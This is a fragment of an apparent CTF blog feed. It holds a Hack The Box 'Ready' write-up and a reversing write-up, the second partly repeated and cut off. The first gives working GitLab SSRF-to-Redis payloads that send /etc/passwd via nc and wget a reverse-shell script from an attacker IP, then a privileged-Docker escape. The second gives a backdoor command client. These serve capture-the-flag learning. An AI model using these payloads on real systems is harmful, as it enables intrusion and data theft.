&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This payload is URL encoded and then &lt;code&gt;git://[0:0:0:0:0:ffff:127.0.0.1]:6379/&lt;/code&gt; is added to the front to bypass the check filter to block requests to localhost on the GitLab server. The next step is to create a new project and chose to import a git repo by URL.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-importproject.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Provide our URL encoded payload, set up a netcat listener on port 1234, and then submitting the payload, returns the contents of &lt;code&gt;/etc/password&lt;/code&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git://&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;0:0:0:0:0:ffff:127.0.0.1&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;:6379/%0A%20multi%0A%20sadd%20resque:gitlab:queues%20system_hook_push%0A%20lpush%20resque:gitlab:queue:system_hook_push%20%22%7B%5C%22class%5C%22:%5C%22GitlabShellWorker%5C%22,%5C%22args%5C%22:%5B%5C%22class_eval%5C%22,%5C%22open&lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;%5C&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;%7Ccat%20/etc/passwd%20%7C%20nc%2010.10.14.142%201234%5C&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.read%5C%22%5D,%5C%22retry%5C%22:3,%5C%22queue%5C%22:%5C%22system_hook_push%5C%22,%5C%22jid%5C%22:%5C%22ad52abc5641173e217eb2e52%5C%22,%5C%22created_at%5C%22:1513714403.8122594,%5C%22enqueued_at%5C%22:1513714403.8129568%7D%22%0A%20exec%0A%20exec%0A/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-etcpasswdfromimport.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;foothold&#34;&gt;Foothold&lt;/h2&gt;
&lt;p&gt;Obtaining a reverse shell proved to be a bit tricky. Executing one reverse shell directly from called back but then terminated immediately. Instead, a shell can be obtained in few additional steps. Create a bash reverse shell in a script and start a python http server. Then use two SSRF requests. The first one downloads the revershell using wget. The second one executes it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Get script.sh&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; multi
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; sadd resque:gitlab:queues system_hook_push
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; lpush resque:gitlab:queue:system_hook_push &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{\&amp;#34;class\&amp;#34;:\&amp;#34;GitlabShellWorker\&amp;#34;,\&amp;#34;args\&amp;#34;:[\&amp;#34;class_eval\&amp;#34;,\&amp;#34;open(\&amp;#39;| wget http://10.10.14.142/script.sh \&amp;#39;).read\&amp;#34;],\&amp;#34;retry\&amp;#34;:3,\&amp;#34;queue\&amp;#34;:\&amp;#34;system_hook_push\&amp;#34;,\&amp;#34;jid\&amp;#34;:\&amp;#34;ad52abc5641173e217eb2e52\&amp;#34;,\&amp;#34;created_at\&amp;#34;:1513714403.8122594,\&amp;#34;enqueued_at\&amp;#34;:1513714403.8129568}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Execute script.sh&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; multi
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; sadd resque:gitlab:queues system_hook_push
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; lpush resque:gitlab:queue:system_hook_push &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;{\&amp;#34;class\&amp;#34;:\&amp;#34;GitlabShellWorker\&amp;#34;,\&amp;#34;args\&amp;#34;:[\&amp;#34;class_eval\&amp;#34;,\&amp;#34;open(\&amp;#39;| bash script.sh \&amp;#39;).read\&amp;#34;],\&amp;#34;retry\&amp;#34;:3,\&amp;#34;queue\&amp;#34;:\&amp;#34;system_hook_push\&amp;#34;,\&amp;#34;jid\&amp;#34;:\&amp;#34;ad52abc5641173e217eb2e52\&amp;#34;,\&amp;#34;created_at\&amp;#34;:1513714403.8122594,\&amp;#34;enqueued_at\&amp;#34;:1513714403.8129568}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; exec
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;/ssrf.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-shellhuzzah.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;user&#34;&gt;User&lt;/h2&gt;
&lt;p&gt;Very first thing to do, especially since this was a pain, is to upgrade are shell so we have more options and are less likely to crash it.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ python3 -c &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;import pty; pty.spawn(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;orking$ python3 -c &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;import pty; pty.spawn(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ ^Z
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;zsh: suspended  nc -lnvp &lt;span style=&#34;color:#ae81ff&#34;&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;┌──&lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;nightwolf㉿archlinux&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;-&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;~/HTB/Ready&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;└─$ stty -a | head -n1 | cut -d &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;;&amp;#39;&lt;/span&gt; -f 2-3 | cut -b2- | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/; /\n/&amp;#39;&lt;/span&gt;                                                                                          &lt;span style=&#34;color:#ae81ff&#34;&gt;148&lt;/span&gt; ⨯ &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; ⚙
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;rows &lt;span style=&#34;color:#ae81ff&#34;&gt;54&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;columns &lt;span style=&#34;color:#ae81ff&#34;&gt;170&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;┌──&lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;nightwolf㉿archlinux&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;-&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;~/HTB/Ready&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;└─$ stty raw -echo; fg                                                                                                                                                &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; ⚙
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;1&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;  + continued  nc -lnvp &lt;span style=&#34;color:#ae81ff&#34;&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                               stty rows &lt;span style=&#34;color:#ae81ff&#34;&gt;54&lt;/span&gt; cols &lt;span style=&#34;color:#ae81ff&#34;&gt;170&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ export TERM&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;xterm-256color
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$ exec /bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;git@gitlab:~/gitlab-rails/working$
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The user can be found in &lt;code&gt;/home/dude/user.txt&lt;/code&gt; but the current user of &lt;code&gt;gitlab&lt;/code&gt; is unable to read the file itself. &lt;code&gt;gitlab&lt;/code&gt; doesn&amp;rsquo;t have any interesting groups or files that stand out in it&amp;rsquo;s  home folder. There don&amp;rsquo;t have any passwords to try with suds or su. Expanding the search, for config files that might contain credentials or other interesting info,  &lt;code&gt;.dockerenv&lt;/code&gt; is found. This  is a file in the root of the file system, letting us know that the current shell is inside a docker container.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-inthematrix.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;In the the &lt;code&gt;/opt&lt;/code&gt; directory there is a folder titled &amp;ldquo;backup&amp;rdquo; inside are various configuration files for GitLab and a docker compose file that looks to have been the same one that may have been used to start this container.&lt;/p&gt;
&lt;p&gt;Another file present in the same folder is &lt;code&gt;gitlab.rb&lt;/code&gt; a configuration file for GItLab. There is a lot of data to sift through inside it. Grep can be used to to filter out some more useful info. For example the following can be used to find references to &amp;ldquo;password &amp;ldquo;&lt;code&gt;grep -R &amp;quot;password&amp;quot; ./&lt;/code&gt;  and reveals, &lt;code&gt;wW59U!ZKMbG9+*#h&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-backupdirpassword.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;This password is not valid for &lt;code&gt;dude&lt;/code&gt; but does allow  &lt;code&gt;su&lt;/code&gt; to &lt;code&gt;root&lt;/code&gt; user inside the container. User.txt is also accessible.&lt;/p&gt;
&lt;h2 id=&#34;root&#34;&gt;Root&lt;/h2&gt;
&lt;p&gt;Docker is a platform that makes use of Linux namespaces to provide an isolated environment called a container. They can seem similar to virtual machines but are different on a technical level. If you want to read some more about that you can check out the &lt;a href=&#34;https://docs.docker.com/get-started/overview/#the-underlying-technology&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;documentation&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The docker compose file found before showed the container was likely started with the &lt;code&gt;--privileged&lt;/code&gt; flag, not something. The &lt;code&gt;--privileged&lt;/code&gt; flag launches the container with extended privileges that can be abused.&lt;/p&gt;
&lt;p&gt;From the documentation, &amp;ldquo;By default, Docker containers are “unprivileged” and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a “privileged” container is given access to all devices (see the documentation on &lt;a href=&#34;https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;cgroups devices&lt;/a&gt;
).&lt;/p&gt;
&lt;p&gt;When the operator executes &lt;code&gt;docker run --privileged&lt;/code&gt;, Docker will enable access to all devices on the host as well as set some configuration in AppArmor or SELinux to allow the container nearly all the same access to the host as processes running outside containers on the host. Additional information about running with &lt;code&gt;--privileged&lt;/code&gt; is available on the &lt;a href=&#34;http://blog.docker.com/2013/09/docker-can-now-run-within-docker/&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Docker Blog&lt;/a&gt;
.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;This is going to enable escape from the container and gain root on the host in two very simple commands. First make a directory and then simply mount sda2 in that directory.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;mkdir -p /mnt/hola
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;mount /dev/sda2 /mnt/hola
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From the the file system from of the host system is accessible the container.  &lt;code&gt;/mnt/hola/root&lt;/code&gt; contains the root flag.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-mountoutsidefilesystem.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;It is possible to obtain a root shell on the host system itself through several methods. One of which is retrive the root ssh key from, &lt;code&gt;/mnt/hola/root/.ssh/id_rsa&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-caniintrestyouinashell.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ready-indeedyoucan.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;h2 id=&#34;wrap-up&#34;&gt;Wrap up&lt;/h2&gt;
&lt;p&gt;Huge thanks to &lt;a href=&#34;https://app.hackthebox.eu/users/27897&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;bertolis&lt;/a&gt;
 for creating this machine.  I did see several comments talking about how it was very similar to another machine that was active at the time but it still felt unique to me, especially after foothold. A docker escape was also pretty fun and I&amp;rsquo;d like to learn more advanced ways to do that in the future.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Cyber Apocalypse 2021: Backdoor</title>
      <link>http://0xnightwolf.github.io/ctf-writeups/ca-backdoor/</link>
      <pubDate>Sun, 25 Apr 2021 00:00:00 -0200</pubDate>
      
      <guid>http://0xnightwolf.github.io/ctf-writeups/ca-backdoor/</guid>
      <description>&lt;p&gt;&lt;em&gt;Note: I did not solve this challenge until after the CTF had officially ended.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;File shows that bd, is a stripped binary which can make reversing a bit harder.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ file bd
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;bd: ELF 64-bit LSB shared object, x86-64, version &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;SYSV&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; GNU/Linux 3.2.0, BuildID&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;sha1&lt;span style=&#34;color:#f92672&#34;&gt;]=&lt;/span&gt;1da3a1d77c7109ce6444919f4a15e7e6c63d02fa, stripped
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Nothing relevant shows up in strings though it&amp;rsquo;s interesting to note the size of the binary.&lt;/p&gt;
&lt;p&gt;Once opened in Ghidra, an interesting section can be seen in the program tree.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ca-backdoor-pydata.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Pydata is a section that indicates this binary is actually a &amp;ldquo;frozen&amp;rdquo; python script that has been packaged with all needed dependencies inside an ELF file. This makes it fairly portable and also accounts for the size of the binary.&lt;/p&gt;
&lt;p&gt;The next step is to extract the python from this executable. After that, it should be readable like any other python script. First, objcopy is used to extract pydata.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;nightwolf@archlinux ~/CTF/cyber-apocalypse/ % objcopy --dump-section pydata&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;pydat.out bd
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can then be feed to &lt;code&gt;pydecipher&lt;/code&gt; to decompress the actual python code.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;nightwolf@archlinux ~/CTF/cyber-apocalypse/ % ~/.local/bin/pydecipher -d -v bd
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An output folder is created that contains all the decompressed data.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ca-backdoor-pythoncode.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;The majority of this is dependencies &lt;code&gt;db.py&lt;/code&gt; is is the most interesting. It contains an simple socket implementation that listens for connections providing the md5 sum of a specific string and then executing commands that follow.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ca-backdoor-dbpy.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note: the local version of the script as show isn&amp;rsquo;t quiet right. All the strings need to be typed as bytes but weren&amp;rsquo;t by the extractor.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;With this info, a script can be created that opens a connection with the remote target, sends &lt;code&gt;s4v3_th3_w0rld&lt;/code&gt;, and then executes commands to retrieve the flag.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;#!/usr/bin/python3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; socket
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; readline
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;from&lt;/span&gt; hashlib &lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; md5
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;server &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;port &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;4433&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;password &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;b&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;s4v3_th3_w0rld&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;while&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;True&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    command &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; input(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt; command &lt;span style=&#34;color:#f92672&#34;&gt;==&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;exit&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        print(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Exiting...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        exit()
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    data &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; ( &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; command:&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; command)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; socket&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;socket(socket&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;AF_INET, socket&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;SOCK_STREAM)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;connect((server, port))
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;sendall((md5(password)&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;hexdigest() &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; command:&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; data)&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;encode())
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    print(s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;recv(&lt;span style=&#34;color:#ae81ff&#34;&gt;4096&lt;/span&gt;)&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;decode())
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    s&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;close()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s important to remember the server will only receive 32 bytes of data. Anything sent beyond that will be cut off and likely cause an error.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Cyber Apocalypse 2021: Backdoor</title>
      <link>http://0xnightwolf.github.io/posts/ca-backdoor/</link>
      <pubDate>Sun, 25 Apr 2021 00:00:00 -0200</pubDate>
      
      <guid>http://0xnightwolf.github.io/posts/ca-backdoor/</guid>
      <description>&lt;p&gt;&lt;em&gt;Note: I did not solve this challenge until after the CTF had officially ended.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;File shows that bd, is a stripped binary which can make reversing a bit harder.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ file bd
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;bd: ELF 64-bit LSB shared object, x86-64, version &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;SYSV&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;, dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; GNU/Linux 3.2.0, BuildID&lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;sha1&lt;span style=&#34;color:#f92672&#34;&gt;]=&lt;/span&gt;1da3a1d77c7109ce6444919f4a15e7e6c63d02fa, stripped
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Nothing relevant shows up in strings though it&amp;rsquo;s interesting to note the size of the binary.&lt;/p&gt;
&lt;p&gt;Once opened in Ghidra, an interesting section can be seen in the program tree.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/ca-backdoor-pydata.png&#34;
        alt/&gt;&lt;/p&gt;
